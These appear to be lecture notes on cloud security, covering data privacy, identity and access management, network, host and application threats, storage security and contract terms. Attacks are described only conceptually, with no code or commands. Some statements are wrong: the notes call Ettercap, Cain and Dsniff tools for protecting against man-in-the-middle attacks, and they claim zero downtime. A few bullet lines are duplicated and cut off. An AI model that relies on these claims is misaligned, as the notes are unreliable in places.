gecnilokheri.ac.ingecnilokheri.ac.in/GPContent/Unit-IV Cloud computing 8th … · Web viewUnit IV Cloud Computing. Data Privacy & Security in Cloud Computing. Cloud technology has

Unit IV Cloud Computing1. Data Privacy & Security in Cloud Computing

Cloud technology has given opportunities to many businesses to showcase their potential in the business world. SMEs are not only getting an opportunity to grow, they are also taking their business operations to the next level. Cloud technology has opened a door for small & medium scale companies to acquire market share by entering the yard of bigger players. As the business requirements have become on-demand and need-based, it gave many companies a significant edge and allow them to complete in a much larger business space.

Cloud technology provides various advantages. Starting from data management, data storage, 0% downtime, CRM management, resource optimization to entire business automation. It also reduces a high amount of investment and saves a lot of time.

At the same time, cloud computing has raised multiple eyebrows with IT management, especially when it comes to data security in the cloud computing. Data security and privacy protection are two major factors. These two factors are becoming more important for the future development of cloud computing technology in business, industry, and government. While addressing this fear, Google claimed that data stored in the cloud are much safer.

What are the Challenges?Data Replication

Every business faces this challenge. Snapshots and data backups are taken on a daily basis. They automatically stored in the cloud. Are you aware where they have been stored and who can see and access them? Can you identify and control unauthorised copying of your data?

Data Loss

Data loss can be a disaster for any business. Virtual data can be easily lost or exposed as it moves between VMs or in the cloud. Are you sure that authorised users are accessing your data within predefined policies? Do you have the authority to block any user who is violating data use policies?

New Class of Users

Cloud computing need cooperation between security, storage, application, and security admins. They all manage your sensitive business data. With more number of users, the risk also increases. If one admin went wrong, entire data in the system will be at risk.

Insecure APIs

Application Programming Interfaces (API) allow users to customize their cloud computing practices. APIs can be a threat to cloud security because of their nature. APIs give developers the tools to build solutions to integrate their applications with other software. The vulnerability of an API depends on the communication that takes place between applications. While this can help developers and businesses, they also issue serious security concerns.

Internal Threat

Never keep this point out of your mind. You may be thinking data is safe inside. But this is one of the biggest challenge company’s face. Employees can use their access to an organisation’s cloud-based services to misuse or access information related to finance, customer details etc.

How to Protect your Data?

You can protect your business data in the cloud from unauthorised access. All you need is a sharp eye and an extra effort. Here are few practical tips to keep your cloud data safe and secure.

Always keep backup locally

When it comes to business data, you have to be extra conscious. Always have a backup for your data. It is always good to create hard copies of your business data and keep it with yourself so that you can have access them even if you lost the original one. You can use any cloud storage solutions to store your data. You can set up a cloud account & can keep the backup copies. You have another option of keeping the backup data in an external storage device also like a hard disk or a thumb drive. This will allow you to access the information even if without the internet.

Don’t store sensitive data

Technology is changing. Businesses are also changing as per the technology. Data is playing an important role in businesses today. So, data privacy is one of the primary aspects of any business. But if something is there on the internet, it is hard to trust it is safe. So, one should avoid storing the most sensitive files or information in the cloud. Identity theft is on rising and you can’t take any risk. You should keep those files in cloud platform which you access frequently and should avoid putting information related to financial details, competitor details, client details, contact details like phone number/address etc. If you are keeping these files, make sure you encrypt them before uploading.

Data encryption

One of the best ways to protect your data while using cloud storage is to do data encryption. This is the best form of security because you need decryption before accessing the data. This will protect data against service providers and users also. To make it more protected, you can also ensure cloud encryption during uploading and downloading phases. But, this will make data sharing and sync in the cloud platform little slow.

Encrypted cloud service

There are few cloud services which provide local encryption and decryption of your files and information inside that other than storage and backup. This means the service takes care of both encrypting your files and storing them safely in the cloud. This will ensure that no one including the service provider or the administrators can have the access to your data files. There are many free versions and also trial versions available in the market. You can use them to learn how it works and later can upgrade to enjoy more space.

Using password

The first thing which can be done is to put strong password which can stand a hacking. You can take the help of internet to learn how to create a strong password. It is very important to change your password frequently and never use the same password for all the accounts or folders. You can opt for 2-step verification for login if your cloud service offers that option. Google drive use 2 phase log in option, consist of password & code sent to the registered number. This added security will make your data much safer.

Keep an eye on what you do online

The security of your cloud data largely depends on your online behaviour. While using a public computer, never save your password, and always ensure that you logged out properly. Another biggest concern is accessing cloud data in unsecured or open Wi-Fi hotspots. Such connections are unencrypted, hackers can target your data easily. Never save your password in any of the public forum or social media. Change Wi-Fi passwords frequently.

Anti-virus is a must

Sometimes the weakest link happens to be the computer or device you use for cloud data access. You need to put proper protection in your system/device. It will help in securing your business data. If you expose yourself to bugs and viruses, hackers can access your system easily. You need to choose a very effective and robust anti-virus system for your system, which will protect all the files and information inside that. If your system isn’t well protected, and if the system is not encrypted and secured from bugs, hackers can get hold of your information.

Read your user agreement

If you are new to the world of cloud computing and not sure what cloud storage to choose or how it really work, you have to read the user agreement of the service you are going to sign up for. Initially, it will be difficult to understand and at times it will test your patience, but you need to face this. User agreements always carry essential information which can help you understand things in detail.

Access limitation

Give access to those users who really need. Internal users and third party vendors should only get access to those files which will help them to do their jobs. Use encryption keys if required. Make sure to evaluate the users and vendors regularly and add/remove users as per the requirement.

Platform, control & service monitoring

Platform, control & services monitoring is usually performed as a dashboard interface and makes it possible to identify the operational status of the platform being monitored at any time. Each operational element which is monitored provides an operational status indicator. This helps in determining which elements are performing as per the established standards. By identifying such problems, you can take defensive actions to prevent loss of data or service.

Continuous system updating

Cloud data security is enhanced with regular patching and upgrading of systems and application software in the cloud platform. New patches, updates, and service packs for the operating system are required to maintain high-end security levels and support new versions of installed products. You have to be committed enough to identify the market trends and new software versions and communicate gaps in security that can appear in installed systems and applications.

Legal & regulatory challenges

Cloud services can give you the best solutions for your business related problems when you are assured that your & your customers data are private and secure. This should be the primary focus for cloud service providers. There are many legal & regulatory challenges which needs to be addressed when data moves from one country to another.

Multinational Framework on privacy and security :

Uncertainty about the legal and regulatory obligations related to data will increase with the increase of the data in the cloud platform. To ensure every business and country get full advantage of cloud computing, different countries have to cooperate to develop a multinational framework on data privacy and security in the cloud. As cloud computing evolves, and data flows from one country to another. For example, data has been created in India using a software hosted in UK & stored in US with users based in Australia. Cloud provider needs to coordinate this entire process to make sure the data flow is going smooth & safe.

Rules on Cross-border data transfers :

To enhance the efficiency and security of cloud solutions and deliver quick results, cloud service providers must be able to operate datacentres in multiple locations and transfer data freely between them. Smooth data flow allows cloud providers to optimize their service and deliver the best business solutions. However, restrictions on cross-border data transfers can create uncertainty if the rules or the legal framework are not followed.

Conflicting legal obligations :

Different governments have different policies when it comes to data flow in their country. Cloud providers will be in legal trouble if they won’t follow the predefined cyber laws. Divergent rules on privacy, data retention, law enforcement access and other issues can lead to ambiguity. For example, one country might have certain rules when it comes to cloud data storage, which might be in direct conflict with another country or a particular service provider.

In order to protect data in the cloud platform, you need to keep all these above things in mind.

2. Identity and access management (IAM)

Identity and access management (IAM) is a framework of business processes, policies and technologies that facilitates the management of electronic or digital identities. With an IAM framework in place, information technology (IT) managers can control user access to critical information within their organizations. Identity and access management products offer role-based access control, which lets system administrators regulate access to systems or networks based on the roles of individual users within the enterprise.

In this context, access is the ability of an individual user to perform a specific task, such as view, create or modify a file. Roles are defined according to job competency, authority and responsibility within the enterprise.

Systems used for identity and access management include single sign-on systems, multi-factor authentication and privileged access management (PAM). These technologies also provide the ability to securely store identity and profile data as well as data governance functions to ensure that only data that is necessary and relevant is shared. IAM systems can be deployed on premises, provided by a third-party vendor through a cloud-based subscription model or deployed in a hybrid cloud.

Basic components of IAM

On a fundamental level, IAM encompasses the following components:

· How individuals are identified in a system.

· How roles are identified in a system and how they are assigned to individuals.

· Adding, removing and updating individuals and their roles in a system.

· Assigning levels of access to individuals or groups of individuals.

· Protecting the sensitive data within the system and securing the system itself.

What IAM systems should include

Identity access management systems should consist of all the necessary controls and tools to capture and record user login information, manage the enterprise database of user identities and orchestrate the assignment and removal of access privileges. That means that systems used for IAM should provide a centralized directory service with oversight as well as visibility into all aspects of the company user base.

Technologies for identity access and management should simplify the user provisioning and account setup process. These systems should reduce the time it takes to complete these processes with a controlled workflow that decreases errors as well as the potential for abuse while allowing automated account fulfillment. An identity and access management system should also allow administrators to instantly view and change access rights.

These systems also need to balance the speed and automation of their processes with the control that administrators need to monitor and modify access rights. Consequently, to manage access requests, the central directory needs an access rights system that automatically matches employee job titles, business unit identifiers and locations to their relevant privilege levels.

Multiple review levels can be included as workflows to enable the proper checking of individual requests. This simplifies setting up appropriate review processes for higher-level access as well as easing reviews of existing rights to prevent privilege creep, the gradual accumulation of access rights beyond what users need to do their jobs.

IAM systems should be used to provide flexibility to establish groups with specific privileges for specific roles so that access rights based on employee job functions can be uniformly assigned. The system should also provide request and approval processes for modifying privileges because employees with the same title and job location may need customized, or slightly different, access.

Benefits of identity and access management

IAM technologies can be used to initiate, capture, record and manage user identities and their related access permissions in an automated manner. This brings an organization the following benefits:

· Access privileges are granted according to one interpretation of policy and all individuals and services are properly authenticated, authorized and audited.

· Companies that properly manage identities have greater control of user access, reducing the risk of internal and external data breaches.

· Automating IAM systems allows businesses to operate more efficiently by decreasing the effort, time and money that would be required to manage access to their networks manually.

· In terms of security, the use of an IAM framework can make it easier to enforce policies around user authentication, validation and privileges and address issues regarding privilege creep.

· IAM systems help companies better comply with government regulations by allowing them to show that corporate information is not being misused. Companies can also demonstrate that any data needed for auditing can be made available on-demand.

Additionally, by implementing identity access management tools and following related best practices, a company can gain a competitive edge. For example, IAM technologies allow the business to give users outside the organization, like customers, partners, contractors and suppliers, access to its network across mobile applications, on-premises apps and software-as-a-service apps without compromising security. This enables better collaboration, enhanced productivity, increased efficiency and reduced operating costs.

3. Risks associated with IAM

Implementing proper identity and access management tools or platforms means storing all authorizations and credentials in one, unified place. When not secured correctly, this can be a huge risk because if an attacker gains access to the system, all digital identities can be compromised. Similarly, if a specific employee that is authorized to the system does not follow security or password best practices, all of the information could be easily leaked.

Another concern for adopting IAM are challenges in implementation. Legacy systems will typically already have an identity management functionality in place, therefore, converting resources to a new system could be challenging, expensive and time-consuming. However, solutions for minimizing the need of technical support, such as cloud services, are becoming more viable.

4. Trust in cloud computing

Trust issues become particularly important when data processing is decentralized across geographically dispersed data centres and resources are distributed beyond a definable and controllable perimeter, which is especially true in the Cloud computing scenario. In the next section, we illustrate an example to show the importance of trust establishment in Cloud computing, in particular establishing trust on Cloud providers.

Current trends for trust establishment

There are ad-hoc approaches to support the consumers in selecting trustworthy (or dependable) CPs. We classify and briefly analyse these approaches as follows.

· SLAs: In practice, one way to establish trust on CPs is the fulfilment of SLAs. SLA validation and monitoring schemes are used to quantify what exactly a CP is offering and which assurances are actually met. In Cloud computing environments, customers are responsible for monitoring SLA violations and informing the providers for compensation. The compensation clauses in SLAs are written by the CPs in such a way so that the customers merely get the advantage of applying for compensation (e.g., service credits) due to SLA violation. This problem arise for not having standardized SLAs for the stakeholders in Cloud computing marketplace. Although, the problem is addressed by industry driven initiative for establishing standardized SLAs, this initiative is far from implementation in practice.

· Audits: CPs use different audit standards (e.g., SAS 70 II, FISMA, ISO 27001) to assure users about their offered services and platforms. For example, Google lists SAS 70 II and FISMA certification to ensure users about the security and privacy measures taken for Google Apps. The audit SAS 70 II covers only the operational performance (e.g., policies and procedures inside datacenters) and relies on a highly specific set of goals and standards. They are not sufficient to alleviate the users’ security concerns and most of the CPs are not willing to share the audit reports, which also leads to a lack of transparency.

· Measuring & Ratings: Recently, a Cloud marketplace has been launched to support consumers in identifying dependable CPs. They are rated based on a questionnaire that needs to be filled in by current CCs. In the future, Cloud Commons aims to combine consumer feedback with technical measurements for assessing and comparing the trustworthiness of CPs. Furthermore, there is a new commercial Cloud marketplace named SpotCloud that provides a platform where CCs can choose among potential providers in terms of cost, quality, and location. Here, the CPs’ ratings are given in an Amazon-like “star” interface with no documentation on how the ratings are computed.

· Self-assessment Questionnaires: The CSA proposed a detailed questionnaire for ensuring security control transparency of CPs – called the CAIQ (Consensus Assessment Initiative Questionnaire). This questionnaire provides means for assessing the capabilities and competencies of CPs in terms of different attributes (e.g., compliance, information security, governance). However, the CSA metrics working group does not provide any proposals for a metric to evaluate CAIQ yet. This is necessary for comparing the potential CPs based on the answered assessment questionnaire stored in the STAR. Furthermore, the information stored in the STAR repository can be checked against the CCM (Cloud Control Matrix) . This will provide the assurance whether services offered by the CPs comply with the industry-accepted security standards, audits, regulations, control frameworks or not.

5. Parameters of Cloud Infrastructure Security

· Network Security Control: The network has always been the backbone of enterprise infrastructure, be it on-premise or the cloud. At the outset, it is critical to map requirements (in-line with legal and regulatory norms) assessing the current state of network security and the proposed integrations. In virtual environments, orchestrating the set-up, segregating data, proactively protecting assets, and fortifying cloud infrastructure against external attacks are recommended. The cloud provider will deploy a set of default configurations, which must then be aligned to specific security requirements of the enterprise, either by an internal IT team or by an expert and a trusted partner organization.

· Persona and Access Management: Cloud infrastructure combined with IoT can help enterprises reach new levels of productivity and innovation. However, this means that data will be accessed from different devices, requiring different encryption mechanisms within and outside the enterprise. Hence, IAM (identity access management) plays a big part in limiting access as per individual persona, virtual machine roles, and need-to-know basis. Analyzing existing cyber security controls, as well as other app security controls for data privacy and protection, is crucial when deciding on the IAM approach. Also, IAM features are unique to each public cloud infrastructure, and require an expert partner with a mastery of various public cloud infrastructure to customize these for the specific access needs of an enterprise.

· Endpoint Security: The weakest link for any enterprise is often the endpoint. Cloud infrastructure allows a virtually infinite number of devices and interfaces to connect to a network. Every device will have to be configured according to organizational security policies, with specific guidelines for IoT and BYOD. Therefore, the targets of security architecture need to be astutely planned, covering IAM integration with different endpoints, followed by security testing to reduce the number of threats. Other measures include regular VAPTs (vulnerability assessment and penetration tests) and threat intelligence tools such as IllusionBLACK, which activates a decoy whenever an attacker is detected.

· Governance and Risk Assessment (GRC): After the completion of the cloud security planning and design stage, the environment should be stabilized. Here, implementations must be reviewed even as security controls are continually monitored. Continuous observation of cloud infrastructure should be embedded into an organization’s operational policies. This can be achieved through detailed logs and regular audits, once again unique to the cloud infrastructure of an enterprise. .

Approach for Implementation: Considering the admittedly difficult shift from on-premise to cloud, enterprises need to develop a prescriptive approach for cloud infrastructure security. Migration plan should include security compliance checks and gap analysis to ensure transition and mitigate risks. Cloud security solutions should not be limited to a specific or predefined approach – instead, cloud security solutions can be synchronized with enterprise requirements by:

• Individually defining the security architecture and migration approach to –

o Define the actual scope of the work during setup

o Ensure every aspect of cloud security is mapped perfectly

o Offer a specific reference point to operations and governance teams

• Hosting and managing enterprise actions in close conjunction with the cloud service provider

• Adopting a define, discover, diagnose, detail, deliver methodology for regular assessments based on industry-recognized CSA, NIST standards

• Conducting periodic reviews using a robust security management toolkit

• Incorporating best practices as per NIST and CIS-compliance through a four-stage identify, analyze, define and implement, and stabilize process

This approach, considered holistically with SaaS, PaaS, and IaaS-based security solutions, will assist IT decision-makers ensure security for their cloud environment. Enterprises can boldly face risk, embrace innovation, and maintain business continuity with zero disruptions during data migration to the cloud.

6. Level of security

The fundamental basis for developing secure cloud environment is based on various security principles:

· Confidentiality: The prevention of unauthorized disclosure of information that may be intentionally or unintentionally refers to the confidentiality.

· Integrity: The concept of cloud information integrity is based on two principles Prevention of modification of data from unauthorized users and preventing the unauthorized modification of data by authorised user.

· Availability: This Principle ensures the availability of cloud data and computing resources when needed.

· Authentication: It refers to the process of testing the user’s identity and ensures that users are who they claim to be.

· Authorization: It refers to the privileges that are granted to individual or process for enabling them to access any authorized data and computing resources.

· Accountability: This is related to the concept of non-repudiation where the person cannot deny from the performance of an action. It determines the action and behaviour of single individual within cloud system.

Top security threats in cloud computing is classified as network level, host

level and application level.

6.1Network level security issues

In public cloud architecture the data moves to or from the organization, ensure confidentiality and integrity. The network level security risk is classified as three types such as ensuring the data confidentiality,

availability and integrity. The data and recourses previously confined to a private network are now exposed to the internet, share public network belonging to a third-party cloud provider. The user is not using HTTPS (but using HTTP) so it increase the risk. The types of network level security issues are

· Eavesdropping

The unauthorized user access the data due to interception of network traffic, it result in failure of confidentiality. The Eavesdropper secretly listen the private conversation of others. This attack may done over email, instant messaging, etc,

· Replay attack

Its a network attack in which a valid data transmission is maliciously or fraudulently repeated or delayed. The attacker intercepts and save the old messages and later it send to one of participants to gain access to unauthorized resources.

· In Sybil attack

The malicious user pretends to be distinct users after acquiring multiple identities and tries to create relationship with honest user if malicious user is successful to compromise one of the honest user then attack gain unauthorized privileges that helps in attacking process.

· Reused IP address

If user moves out of the network then same IP address is reassigned and reused by other customer, so it will create security risk to new user. A customer can’t assume that network access to its resources is terminated upon release of its IP address. The old IP address is assigned to new user still the chance of accessing the data by some other user. The address still exists in the DNS cache, it violating the privacy of the original user. IP addresses are finite quantity and billable assert. There is a similar lag time between when physical (i.e., MAC) addresses are changed in ARP tables and when old ARP addresses are cleared from cache, an old address persists in ARP caches until they are cleared .

· DNS Attacks

It translate the domain name to an IP address, Since domain name is easier to remember rather than IP address. The user using IP address in not feasible because has been routed to some other cloud instead of the one he asked. The sender and a receiver get rerouted through some evil connection. DNS security measures are

taken, still the route selected between the sender and receiver cause security problems .

· BGP Prefix Hijacking

It’s a type of network attack in which wrong announcement on IP address associated with a autonomous system (AS), so malicious parties get access to the untraceable IP address.AS communicate using Border gateway protocol model. Faulty AS broadcast wrongly about the IP associated with it. In this case the actual traffic get routed to some other IP than the intended one.

· Sniffer Attack

Data is flowing in network, and chance to read the vital information, it can be traced and captured. Sniffer program get recorded through the NIC (network Interface Card) that the data/traffic linked to other systems. Its easily detect a sniffing system running on a network is using ARP (Address resolution Protocol) and RTT (round Trip time).

· Port Scanning

If the customer configures the security group to allow traffic from any source to a specific port, then that specific port will be vulnerable to a port scan. When Port scanning is detected it should be stopped and blocked.

· Dos Attack

Dos attack is an attack it force the system component to limit, or even halt, normal services. The network is unavailable by flooding it , disrupting it, jamming it, or crashing it. The problem in Denial of service on the internet is impossible to prevent. DoS attacks can be prevented with a firewall but they have configured properly.

· Distributed Denial of Service Attack

Distributed Denial of Service attack is a DoS attack that occurs from more than one source, and from more than one location at the same time. DDoS attacks that comes from many "dummy" computers at the same time to flood the server. This is harder to trace or so that they can use more bandwidth.

6.2Host Level Security issues:-

Cloud service provider do not publicly share information related to their host platforms, host operating systems, and processes that are in place to secure the hosts, since hackers can trying to intrude into the cloud service. The host level security issues are

· Security concerns with the hypervisor

Hypervisor is defined as controller called as Virtual machine manager (VMM) that allows multiple OS runs on single machine at a time. If number of Operating system running on hardware platform, security issues get increased, because single hardware unit is difficult to monitor multiple operating systems. eg.:- guest system

tries to run malicious code on the host system and get control of the system and block other guest OS, even it can make changes to any guest OS. Advanced cloud protection system can be developed, in order to monitor the guest VMs and inter communication among the various infrastructure components Virtualization platform is software. Major virtualization platform vendors are VMware, Xen and microsoft. Its important to secure the layer of software that sits between hardware and virtual servers. The isolation of customer VMs from each other in a multitenant environment, it is very important to protect the hypervisors from unauthorized users. To protect the hypervisor the Iaas customer should understand the technology and security process controls instituted by the CSP.

· Virtual server Security

Customers of Iaas have full access to the virtualized guest VMs that are hosted and isolated from each other by hypervisor technology. Virtual server may be accessible on the internet, so sufficient network access preventive steps should be taken to restrict access to virtual instances. The IaaS platform creates a risk due to self provisioning of new virtual server, that leads to create insecure virtual servers. Securing the virtual server in the cloud requires strong operational security procedures.

Protect the integrity of the image from unauthorized users.

• Secure the private keys in the public cloud.

• Keep the decryption keys away from the cloud

• Do not allow password-based authentication for shell access.

• Require role-based access password

• Run a host firewall and open only the minimum ports necessary to support the services on an instance.

• Run only the required services and turn off the unused services

• Enable system auditing and event logging,

• Secure the log events to a dedicated log server.

• Keep the log server separate with higher security protection, including accessing controls.




















• Keep the log server separate with higher security protection, including accessing co

• Protect the integrity of the image from unauthorized users.










6.3Application level security threats:-

Some company hosts an applications in internet that many user use without considering about Where, how, by whom the services are provided, so proper security mechanism should adapt. The types of Application level security threats are :

· SQL Injection attack

Attackers inserted a malicious code into a standard SQL code and it allow unauthorized person to download the entire database or interact it in other illicit ways. The unauthorized user can access the sensitive data. This will be avoided the usage of dynamically generated SQL in the code.

· Cross-site scripting [XSS]

It embedding script tags in URLs and when user clicks on them, the JavaScript get executed on machine. In dynamic websites, some pop ups windows get opened and request the user to click on that link, once user clicked the link the hacker get control and access all our private information .

· EDoS

An attack against the billing model that underlies the cost of providing a service with the goal of bankrupting the service itself. DoS attacks on pay-as-you-go cloud applications will result dramatic increase in your cloud utility bill, increased use of network bandwidth, CPU, and storage consumption. This type of attack is also being characterized as economic denial of sustainability (EDoS).

· Cookie Poisoning

Cookies used to store User IDs. The two types of cookies are: persistent and non-persistent. Persistent cookie is stored on the client hard-drive, hacker who can access the client machine and easily access the cookies. Non-Persistent cookie is stored in memory and more difficult to access. Another attack is unauthorized

person can change or modify the content of cookies to access the application or web page. Cookies contain user identity credential information, one unauthorized person access these details then they can able to forge as an authorized user. This will be overcome by regular cookie cleanup.

· Backdoor and debug options

Normally developers will enable the debugging option while publishing the web site. So hacker can easily enter into the web-site and make some changes . To prevent this attack developer should disable the debugging option.

· Hidden field manipulation

While user accessing the web page some fields are hidden and its used by developer. The hidden fields in HTML forms convey important information such as price, user ID etc. The attacker can save the catalogue page and change the value of hidden field and posted on web page. This will be severe security violation.

· Google Hacking

Google search engine is the best option for the hacker to access the sensitive information. Even the hacker hack the user's account. Generally they try to find out the security loopholes on Google they wish to hack

and then after having gathered the necessary information of the concerned system. A group of hackers in china hacks the login details of various g-mail users. The security threats can be launched at the application level and cause system downtime disabling the application access even to the authorized users.

· Man in the middle attack

This attack is also a category of eavesdropping. The attacker set up the connection between two user and tries to hear the conversation or it provide false information between them. Tools like Dsniff, Cain, Ettercap, Wsniff, Airjack etc have developed to protect from this attack

· Dos Attack

Dos attack the services assigned to the authorized users unable to use by them. The attack, large number of services request handled by the server exceeds become unavailable to the authorized user. DoS attack increases bandwidth consumption besides causing congestion, Due to overloading of the server with the requests. Making certain parts of the clouds inaccessible to the users.Intrusion detection system (IDS) is the most popular method of defense against this type of attacks.

· Distributed Denial of services

DDos is advanced version of DoS in terms of denying the services running on a server is not able to handle it. Three functional units of DDos attacks: A Master, A Sleve and A Victim. Mater being the attack launcher is behind all these attacks causing DDoS, Slave is the network which acts like a launch pad for the Master. It provides the platform to the Master to launch the attack on the Victim. Hence it is also called as coordinated attack. The DDoS attack is operational in two stages: the first one being Intrusion phase and second one DDos tools. In intrusion phase the master tries to compromise the less important machines to support in flooding the more important one. The installing DDos tools and attacking the victim server or machine. DDos attack the services is unavailable to authorized user Its similar to Dos Attack but the way of launching is different. DDos attack was experienced with CNN news channel website is unable to access the site for a period of three hours.

Other Security Threats:

· Failures in Providers Security

Security is necessary when designing cloud because cloud service provider controls the hardware and hypervisor on which data is stored and application also runs on the cloud infrastructure.

· Attacks by other Customer

The cloud service provider resources shared with untrusted parties. The one customer can access the other customer sensitive information. This is highly possible in cloud. To overcome this problem strong cryptography, application-layer operation should be applied.

· Availability and reliability issues

Cloud service is accessible through internet, so internet availability and reliability is essential. Service accessible through internet so complexity increase due to change of failure. The countermeasures are monitoring the availability carefully.

· Legal and Regulatory Issues

The cloud computing have many legal and regulatory issues regarding the data exposed outside the jurisdiction.

· Perimeter security model broken

Many organizations use a perimeter security model with strong security at the perimeter of the enterprise network. Now all critical data and applications are stored in cloud but its outside the perimeter of enterprise control.

· Integrated Provider and customer Security

The problem is disconnected provider and customer security systems. If there is any misbehaviour in cloud, not reported to the customer. The cloud service provider should adapt Proper integrity identity management

INFRASTRUCTURE SECURITY: THE NETWORK LEVEL

As network level of infrastructure security is concerned , it is important to distinguish between public clouds and private clouds. With private clouds, there are no new attacks, vulnerabilities, or changes in risk specific to this topology that information security personnel need to consider. If public cloud services are chosen, changing security requirements will require changes to the network topology and the manner in which the existing network topology interacts with the cloud provider's network topology should be taken into account

There are four significant risk factors in this use case:

1. Ensuring the confidentiality and integrity of organization's data-in-transit to and from a public cloud provider.

2. Ensuring proper access control

3. Ensuring the availability of the Internet-facing resources 4. Replacing the established model of network zones and tiers with domains.

INFRASTRUCTURE SECURITY - THE HOST LEVEL

When reviewing host security and assessing risks, the context of cloud services delivery models (SaaS, PaaS, and IaaS) and deployment models public, private, and hybrid) should be considered . The host security responsibilities in SaaS and PaaS services are transferred to the provider of cloud services. IaaS customers are primarily responsible for securing the hosts provisioned in the cloud (virtualization software security, customer guest OS or virtual server security).

INFRASTRUCTURE SECURITY THE APPLICATION LEVEL

Software security or applications should be a crucial element of a security program. Most enterprises with information security programs have yet to introduce an application security program to address this domain. Designing and implementing applications aims at deployment on a cloud platform will require existing application security programs to reexamine current practices and standards. The application security spectrum ranges from single-user applications to multiuser e-commerce applications used by many users. The level is responsible for managing : _

· Application-level security threats;

· End user security;

· SaaS application security;

· PaaS application security;

· Customer-deployed application security

· IaaS application security

· Public cloud security limitation

7. Data security and storage:

A DEFINITION OF CLOUD STORAGE SECURITYWhile cloud storage is convenient and gives employees access to their data anywhere, at any time, on nearly any device, cloud storage security is a top concern for organizations’ IT and security departments. The benefits brought by cloud storage – from scalability and accessibility to decreased IT overhead – are driving rapid adoption at enterprises around the world, and there are steps that companies should take to improve cloud storage security and keep sensitive data safe and secure in the cloud.

THE NEED FOR CLOUD STORAGE SECURITY

Businesses and enterprises use cloud services because they provide cost-effective and flexible alternatives to expensive, locally-implemented hardware. But conducting business in the cloud means that confidential files and sensitive data are exposed to new risks, as cloud-stored data resides outside of the limits of many safeguards used to protect sensitive data held on-premise. As such, enterprises must take additional measures to secure cloud storage beyond the sometimes basic protections offered by providers.

The rise of Internet of Things (IoT) technology and the connected office has also made enterprises more reliant on cloud technology, albeit while driving security risks. Even smart printers have been found vulnerable to data leakage, and as more corporate devices become internet-connected, the potential for compromise or unintended leakage increases.

CLOUD STORAGE SECURITY BASICSAs enterprises move further along the cloud adoption curve, cloud storage security is becoming a top priority – both in enterprises’ IT architecture and information security strategies. Companies now recognize that it’s critical to protect sensitive data while enabling employees to enjoy the performance and flexibility of the cloud.Cloud storage providers and enterprises share responsibility for cloud storage security. Cloud storage providers implement baseline protections for their platforms and the data they process, such authentication, access control, and encryption. From there, most enterprises supplement these protections with added security measures of their own to bolster cloud data protection and tighten access to sensitive information in the cloud.

CLOUD STORAGE SECURITY CHALLENGESOne of the biggest challenges with cloud storage security is that employees use free file sharing and cloud storage services that are not approved by the organization and may not meet minimum security standards. Knowingly or not, employees can put company data at risk by using these services, particularly without the IT department’s knowledge or approval.In addition to implementing security solutions to protect sensitive data against unauthorized access or egress and enforce cloud security policies, it is critical that organizations educate their employees on the risks posed by sharing and storing information in the cloud. Additionally, organizations must take the appropriate security measures to mitigate cloud storage security risks introduced by employees who may inadvertently use services and applications that don’t meet the company’s security standards.There are complex data security challenges in the cloud: · The need to protect confidential business, government, or regulatory data· Cloud service models with multiple tenants sharing the same infrastructure · Data mobility and legal issues relative to such government rules as the EU Data Privacy Directive · Lack of standards about how cloud service providers securely recycle disk space and erase existing data· Auditing, reporting, and compliance concerns · Loss of visibility to key security and operational intelligence that no longer is available to feed enterprise IT security intelligence and risk management· A new type of insider who does not even work for your company, but may have control and visible into your data.

CLOUD STORAGE SECURITY SOLUTIONS

Data protection solutions for cloud storage security provide complete visibility and policy-based control over how data can be moved to and from the cloud, ensuring that only authorized data leaves the company’s environment and that data access is limited to authorized parties. In doing so, companies can enforce stricter protections around sensitive data than what many cloud storage providers offer and provide a second line of defense in the event that a provider has a security compromise.

When choosing a cloud storage security solution, enterprises should be sure that it provides continuous monitoring and visibility for all data interactions with cloud storage applications, provides granular control over file movement based on browser and OS events involving file sharing and cloud storage sites, integrates with leading cloud storage providers to be able to extend data protection measures to data stored in the cloud, automatically encrypts sensitive data prior to egress, accurately classifies any data downloaded from web applications, and delivers forensic event logs for effective alerting, reporting, and policy creation.

8. Five key legal considerations when negotiating cloud contracts

Cloud contracts 1: Understand provider’s terms

Cloud computing services are generally implemented on the provider’s terms - although it can often be a struggle to figure out exactly what those terms are.

Watch out for some cloud providers’ complex, multi-document contract structures that may be poorly updated and oddly worded. In particular, don’t assume that you know what’s in a provision based on its heading. For example, in some terms, ‘force majeure’ seems to be elastic-sided enough to capture “changes in the taxation basis of services delivered via the Internet” as a force majeure event!

Understandably, contracts for private cloud solutions and with system integrators/resellers allow more scope for negotiation than contracts with public cloud providers. However, even in public cloud deals, terms are increasingly negotiable - although the degree of negotiability certainly pales in comparison with traditional outsourcing contracts.

Some of the key issues that tend to recur in cloud contract negotiations include:

• customer control and visibility over subcontracting, with a general reluctance from providers to allow approval over, or even to identify, subcontractors;• limitations on the provider’s ability to change the nature of the services. (Here it’s generally advisable for customers to focus on the commercial implications of such changes, rather than the right itself);• privacy and data security commitments;• rights of the provider to suspend services, e.g., for non-payment or violation of an acceptable use policy;• limitations of liability; and

• exit provisions allowing the customer to extend service for a period after termination or expiry to allow migration to the replacement solution.Technical areas don’t tend to lend themselves to negotiation given the commoditised nature of cloud solutions - and you can show your naivety by asking for changes that directly contradict the services model.

Cloud contracts: 2. Due diligence

Because of the constraints on your ability to negotiate the provider’s cloud terms, it’s essential to carry out appropriate due diligence on the provider. Areas of focus should include:

· Location of services

· Service performance and usability

· Existing customers (references)

· Data location, processing, portability and recovery

· Security

· Interoperability

· Business continuity

· Exit

Cloud contracts: 3 - Data privacy remains centre stage

It’s also vital to understand how responsibility for data privacy obligations will be allocated between you and the provider, including who is responsible for data security.

Typically, providers have been more willing to take on responsibility for network integrity, while trying to steer clear of obligations in relation to security of the data itself.

However, over recent years, cloud service providers have been improving their privacy offerings. For example, there has been an increased willingness of providers to adopt the EU model clauses for data transfer.

In addition, many providers now offer European-based data centres, reacting to commercial pressures from Europe-based clients.

When evaluating cloud solutions:• classify the data concerned (including its sensitivity), and consider what would happen if data was disclosed, lost or corrupted;• consider what the business impact would be if you were unable to use the data;• check whether the provider is compliant with ISO/IEC 27001/2 and, if a public cloud provider, ISO/IEC 27018; and• ensure that your deployment of cloud will comply with applicable data protection law, taking into account all relevant regulatory guidance, e.g., the EU Data Protection Working Party 29’s opinion on cloud, the EU Cloud Standardisation Guidelines and the ICO’s guidance on cloud computing.

Cloud contracts: 4 - Performance commitments are hard to find

Ensure that you are comfortable with the level of service performance commitment offered by the cloud provider.

Most cloud contracts remain pretty light in terms of service levels, with availability being the typical measurement metric. Check the wording of the SLAs carefully – watch out for references to ‘service levels designed to be available’, ‘target service levels’, etc.

